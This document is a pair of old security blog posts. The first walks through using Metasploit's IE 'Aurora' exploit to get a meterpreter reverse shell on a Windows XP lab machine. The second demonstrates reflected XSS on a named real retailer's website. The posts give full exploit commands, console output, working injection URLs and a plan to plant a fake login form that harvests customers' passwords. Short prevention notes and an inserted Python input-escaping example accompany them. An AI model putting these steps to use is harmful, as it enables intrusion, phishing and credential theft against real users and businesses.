Tuesday, February 9, 2010


Laboratory - Metasploit - Phishing Exploit


Well, I think everyone has heard of the IE 0-day that has been talked about so much lately: through a buffer overflow it lets arbitrary code be injected and a shell obtained. Not every setup is vulnerable, though; here is a small table showing how some Windows versions stand together with their IE version. By now, of course, antivirus already detects it..


[Image: table of Windows versions and IE versions and whether they are vulnerable, source: http://elladodelmal.blogspot.com/]


The lab consists of a virtual machine (VirtualBox; in the next post I will explain how to install it, with a hacking bonus!) running Windows XP SP3 with Internet Explorer 6.0, which is completely vulnerable. Luckily it is very rare to find users browsing with that version, but.... :) Heh..

To begin you need Metasploit. You can download it from here; for Linux there are 32-bit and 64-bit builds (I downloaded framework-3.3.3-linux-x86_64.run). There is also a Windows build, but the latest one did not yet include the Aurora exploit; it can be added by downloading the .rb file and placing it in the exploit/windows/browser folder, which would be ideal. Here is the exploit. Once Metasploit is installed and everything has gone well (on Linux you need to install Ruby), open the Metasploit console.

/home/user# msfconsole


+ -- --=[ 320 exploits - 99 auxiliary
+ -- --=[ 217 payloads - 20 encoders - 6 nops
       =[ svn r8438 updated yesterday (2010.02.09)

msf >

Once inside the Metasploit console, we have to choose the exploit to use:


msf > use windows/browser/ie_aurora
msf exploit(ie_aurora) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Once the exploit is loaded with the use command, we can see the arguments the exploit needs in order to run with the show options command. As payload we will use a reverse shell, set as follows:


msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp



Now let's fill in the arguments of both the payload and the exploit:
msf exploit(ie_aurora) > set LHOST 190.18x.xx.xxx
LHOST => 190.18x.xx.xxx
msf exploit(ie_aurora) > set URIPATH /
URIPATH => /
msf exploit(ie_aurora) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     190.18x.xx.xxx   yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Automatic





The screen shows the values that were set; LHOST is the attacker's IP. I launch the exploit:


msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
msf exploit(ie_aurora) >
[*] Started reverse handler on 190.18x.xx.xxx:4444
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://190.18x.xx.xxx:8080/
[*] Server started.


The server is running on the LHOST IP on port 8080, and the reverse shell handler is listening on port 4444 :).
Now we send the link to the victim and wait for them to open it.





Let's look at our Metasploit console :)





[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client 190.18x.xx.xxx
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (190.18x.xx.xxx:4444 -> 190.18x.xx.xxx:51513)

msf exploit(ie_aurora) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  190.18x.xx.xxx:4444 -> 190.18x.xx.xxx:51513

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: VICTIM
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US




We can see that we have a session with the victim, who is running Windows XP SP3. Now for the remote shell, which is the best part :)

meterpreter > shell
Process 812 created.
Channel 1 created.
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Victima 10\Escritorio> hostname
hostname
victima

C:\Documents and Settings\Victima 10\Escritorio>





Solution


Browsing with an antivirus would be the best defence against this exploit; NOD32 detects it and does not let it inject. Also, do not use an outdated Internet Explorer such as 6.x, which is what was used in this POC. While things like this keep happening, stop using the defective software until the company that owns it releases the patch; for every program there is always another that does the same job, so choose that one temporarily.





References:

http://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html
http://foro.elhacker.net/hacking_avanzado/metasploit_0day_ie_exploit_ieaurora-t281678.0.html

Greetings!

Monday, February 1, 2010


ie_aurora via XSS (POC Luis A. Cuadrado) Denial of Service elhacker.net

Well, since XSS is so fashionable these days, and given the number of sites vulnerable to it, I will show one of its many uses: deception. First, what is phishing? It is the art of deceiving the victim into believing that a site is trustworthy when in fact it is malicious, in order to steal data (name, username, passwords, credit card, etc.). There is a difference between common phishing and phishing through XSS. Example: suppose we are customers of bancoX, whose login page is http://bancoX.com/login.php. An attacker could, through some form of social engineering, lure the victim into a site the attacker built, making them believe it is the original, when the malicious site is actually http://sitiomaligno/bancoX/login.php. So one way to always check whether an address is phishing is to look at our browser's address bar and make sure we are where we intended to go.

Phishing with XSS is much more effective, because the attacker exploits the trust the customer has in that domain: by injecting HTML they can fool the person into handing over their data, while the user can look at the browser's address bar and really be on the right site, the one they trust.

For a better understanding, I will show a real site, that of Luis A. Cuadrado. This company is by far the most prestigious seller of computer supplies in Corrientes and Resistencia (capital of Chaco), but it does not seem to care much about the safety of its customers. What caught my attention was this link, http://www.luiscuadrado.com/login.php, and that is when I decided to write this article.





As a registered user you can see the products you buy and the address they can be shipped to.

CHECKING THE FLAW

Well, the flaw lies in a variable, $products_id, which takes a number, runs a query against the database and returns the information for the product in question. Now, if the number passed is products_id=1249 (an existing product with id 1249), the value is printed on the screen without passing through any filter :).

First example: http://www.luiscuadrado.com/product_info.php?products_id=1249%20%3Cscript%3Ealert%28123%29%3C/script%3E oops! XSS!

Now let's see something prettier and in more detail. What I did was create a PHP script with a form asking for Email and Password, and that data is saved to a text file; the injection is done through an iframe.

Second example: http://www.luiscuadrado.com/product_info.php?products_id=1249%20%3Ciframe%20src=http://www.google.com%20height=%22300%22%20width=%22800%22%3E%3C/iframe%3E Google framed inside the page! Heh.. Now there is something better, which is to do what we were talking about: inject a form asking for email and password..

See the login form: quietly, you can fool people into entering their keys and then get into the system. (At the moment the link is not up; I will upload the PHP to a friend's server so it can be viewed from the browser.) The data is stored in a txt file.




The scenario is ready; all that remains is to use some imagination to deceive their customers. And perhaps pick up some extra computer supplies! XD

Prevention:

All variables shown on screen should be passed through a filter so as not to have this kind of problem. Obviously it depends on the quality of the programmer, since you face not only XSS but also CSRF/XSRF, where the one who gets hurt is the end user. I recommend using add-ons such as NoScript for Firefox, and always being wary of any mail, SMS or MSN message that sends us to a site asking for our user data for some reason X; make sure that the site we are on is who it claims to be!

More documentation:

http://itfreekzone.blogspot.com/2009/12/cruzando-informacion-cross-site.html
http://itfreekzone.blogspot.com/2009/12/rompiendo-lo-grande-xss-avanzado.html
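The filter the Prevention section calls for, as an added example that is not code from the post or from the site: the unfiltered reflection of products_id beside a hardened version that validates the id as a plain integer before it is used and HTML-escapes anything echoed back. It is written in Python rather than the site's PHP (the equivalent calls there are filter_var with FILTER_VALIDATE_INT and htmlspecialchars); the query strings are those of the two example URLs above, and the product table is a made-up stand-in for the database.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed inputs: the query strings of the two URLs quoted in the post
# (kept URL-encoded, as a browser would send them) plus a normal request.
# Nothing here contacts the site; request handling is simulated locally.
SCRIPT_INJECTION = "products_id=1249%20%3Cscript%3Ealert%28123%29%3C/script%3E"
IFRAME_INJECTION = ("products_id=1249%20%3Ciframe%20src=http://www.google.com"
                    "%20height=%22300%22%20width=%22800%22%3E%3C/iframe%3E")
NORMAL_REQUEST = "products_id=1249"

PRODUCTS = {1249: "Some product"}  # made-up stand-in for the database lookup


def first_param(query, name):
    """First value of a query parameter, URL-decoded, or None if absent."""
    values = parse_qs(query, keep_blank_values=True).get(name)
    return values[0] if values else None


def render_vulnerable(query):
    """The bug the post describes: the id goes from the URL into the HTML
    untouched, so the browser renders whatever markup the link carried."""
    pid = first_param(query, "products_id")
    return f"<p>Product {pid}</p>"


def render_hardened(query):
    """Two layers: products_id must be a plain decimal integer before it is
    used at all (so a tag never reaches the query or the page), and every
    value reflected into HTML, even in an error message, is escaped."""
    raw = first_param(query, "products_id")
    if raw is None or not re.fullmatch(r"[0-9]{1,10}", raw.strip()):
        return f"<p>Invalid product id: {html.escape(raw or '')}</p>"
    pid = int(raw)
    name = PRODUCTS.get(pid, "not found")
    return f"<p>Product {pid}: {html.escape(name)}</p>"


if __name__ == "__main__":
    for q in (NORMAL_REQUEST, SCRIPT_INJECTION, IFRAME_INJECTION):
        print("vulnerable:", render_vulnerable(q))
        print("hardened  :", render_hardened(q))
```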


Greetings!